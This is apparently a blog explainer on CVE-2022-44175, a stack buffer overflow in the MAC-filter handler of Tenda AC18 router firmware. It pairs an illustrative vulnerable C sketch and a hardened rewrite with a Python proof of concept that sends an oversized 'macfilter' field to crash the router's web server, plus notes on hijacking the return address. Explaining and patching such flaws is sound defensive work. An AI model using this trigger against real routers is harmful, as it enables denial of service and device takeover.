In November 2022, security researchers reported a critical stack-based buffer overflow in the Tenda AC18 router firmware, version V15.03.05.19. The bug, tracked as CVE-2022-44175, lets an attacker who can reach the web admin interface corrupt memory in the router's web server and potentially execute their own code, taking over the device completely. In this post, let's break down how this vulnerability works, see code snippets, and look at how attackers can exploit it.

Firmware: V15.03.05.19 and possibly earlier versions (check your device!)

If your router uses this firmware, you should be aware of this vulnerability.

The Vulnerable Function: formSetMacFilterCfg

The root cause of CVE-2022-44175 is a buffer overflow in a function called formSetMacFilterCfg. This function is the handler the web admin interface runs when you save MAC address filtering rules, so it parses form fields that come straight from the HTTP request.

Buffer Overflow Explained Simply

A buffer overflow happens when a program stores more data in a buffer (a fixed-size region of memory) than the buffer can hold. Insecure programming, such as a missing input size check, lets an attacker send data that overwrites the memory next to the buffer. On the stack, that neighbouring memory includes saved registers and the function's return address, so the result ranges from a crash to running the attacker's code.

Below is a simplified, illustrative sketch of how this bug happens inside formSetMacFilterCfg (it is not the firmware's actual decompiled code):

void formSetMacFilterCfg(void *webRequest) {
    char macAddr[32];                                     /* fixed-size stack buffer */
    char *input = webGetVar(webRequest, "macfilter", ""); /* attacker-controlled form field */
    strcpy(macAddr, input); /* <-- No length check: copies until the NUL, however far away */
    // further code...
}

- Problem: strcpy copies input into macAddr without checking whether input is larger than macAddr (32 bytes, including the terminating NUL).
- What can go wrong? If an attacker submits a "macfilter" POST parameter of 32 bytes or more, the copy runs past the end of macAddr and overwrites adjacent stack data, including the saved return address.
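To show what the handler should have done instead, here is an added example (not Tenda's firmware code, and not from the original post): the unbounded copy from the sketch next to a bounded copy that rejects over-long input before it touches the buffer, plus a format check, since a MAC filter entry should only ever be a MAC address. The function names, the 32-byte buffer size and the sample inputs are assumptions carried over from the simplified sketch above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAC_BUF 32  /* same size as macAddr[] in the simplified sketch (assumed) */

/* The pattern from the sketch: copies until the NUL, however far away it is.
 * Shown only for comparison; never call it with untrusted input. */
void copy_unbounded(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Fixed copy: fail closed if the input does not fit, and only then write.
 * memchr() never reads beyond dstlen bytes, so even an unterminated input
 * cannot make the length check itself read too far. Returns 0 or -1. */
int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    const char *nul = memchr(src, '\0', dstlen);
    if (nul == NULL)
        return -1;                              /* no terminator within dstlen: too long */
    memcpy(dst, src, (size_t)(nul - src) + 1);  /* includes the NUL */
    return 0;
}

/* A MAC filter entry should only ever look like "xx:xx:xx:xx:xx:xx" (17 chars).
 * Validating the shape, not just the length, shrinks the attack surface for
 * whatever parsing happens later in the handler. Returns 1 if valid, else 0. */
int is_mac_address(const char *s)
{
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':')
                return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;   /* also stops safely at an early NUL */
        }
    }
    return s[17] == '\0';
}

/* Hardened equivalent of the sketch's handler body.
 * Returns 0 on success, -1 if the input is too long, -2 if it is not a MAC. */
int set_mac_filter(const char *input, char out[MAC_BUF])
{
    if (copy_bounded(out, MAC_BUF, input) != 0)
        return -1;
    if (!is_mac_address(out))
        return -2;
    return 0;
}

int main(void)
{
    char macAddr[MAC_BUF];
    char oversized[100];  /* constructed: the "A" * 100 payload used later in the post */
    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    printf("valid MAC -> %d\n", set_mac_filter("00:11:22:33:44:55", macAddr));
    printf("100 x 'A' -> %d\n", set_mac_filter(oversized, macAddr));
    printf("not a MAC -> %d\n", set_mac_filter("not-a-mac", macAddr));
    return 0;
}
```

The important design choice is that copy_bounded checks for the terminator with memchr, bounded by the destination size, before any byte is written: strlen on attacker data is itself an over-read if the input is not NUL-terminated, and strncpy silently drops the terminator when the input is exactly the buffer size. Rejecting the request with an error is the right outcome for a router config handler; truncating a MAC address and filtering the wrong device is not.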

How Can This Vulnerability Be Exploited?

Because this function runs whenever MAC filter settings are saved through the admin web interface, an attacker who can reach that interface only needs to send one crafted HTTP request.

Step-by-Step Exploit (Conceptual)

1. Access the Web Interface: The attacker must be able to reach the web admin UI. This usually means being on the same LAN, but if remote management is enabled, the interface is exposed to the internet.
2. Send Oversized Data: The attacker sends a POST request with the "macfilter" parameter set to a string of 32 bytes or more.
3. Overwrite Memory: The copy overwrites adjacent stack memory, including the saved return address, letting the attacker hijack the execution flow when the function returns.

Let's see how an attacker might trigger this using Python:

import requests

# The form handler that calls formSetMacFilterCfg
url = "http://ROUTER-IP/goform/formSetMacFilterCfg"

# Build a payload longer than the 32-byte macAddr buffer
payload = "A" * 100  # 100 bytes: enough to overflow and corrupt the stack

data = {
    "macfilter": payload,
    # Include any other form fields required by the router.
}

# If authentication is required, add the session cookie or headers here,
# e.g. requests.post(url, data=data, cookies={...}, timeout=10)
response = requests.post(url, data=data, timeout=10)
print("Status:", response.status_code)
print("Body:", response.text)

* Replace ROUTER-IP with your router's actual IP address.

Note: In a real attack, the payload is crafted so that the overwritten return address points at attacker-controlled code (shellcode) or at a chain of existing instructions (a ROP chain). The example above only triggers the overflow and will most likely crash the router's web server process, which on its own is a denial of service.

References

- NIST NVD entry for CVE-2022-44175: https://nvd.nist.gov/vuln/detail/CVE-2022-44175
- Original vulnerability report: GitHub Issue
- ExploitDB (if available): See Exploit Details

What Should You Do?

1. Update Your Router Firmware: Always run the latest version available from Tenda. Tenda may have released a patch for this or similar bugs; if no fixed firmware exists for your model, treat the device as exposed.
2. Restrict Admin Access: Make sure the web admin interface is not reachable from the internet (disable remote/WAN management), and preferably allow it only from trusted devices or networks.

Summary

CVE-2022-44175 is a classic stack-based buffer overflow in Tenda's AC18 firmware: insufficient input checking in the formSetMacFilterCfg function lets an attacker who can reach the admin interface corrupt memory and potentially run malicious code. If you own this device, update your firmware and harden your network. For a technical audience, this is a reminder of why proper input handling is essential in C programming: never trust user data, and never copy it into a fixed-size buffer without a bound.

Timeline

Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/28/2022 13:47:00 UTC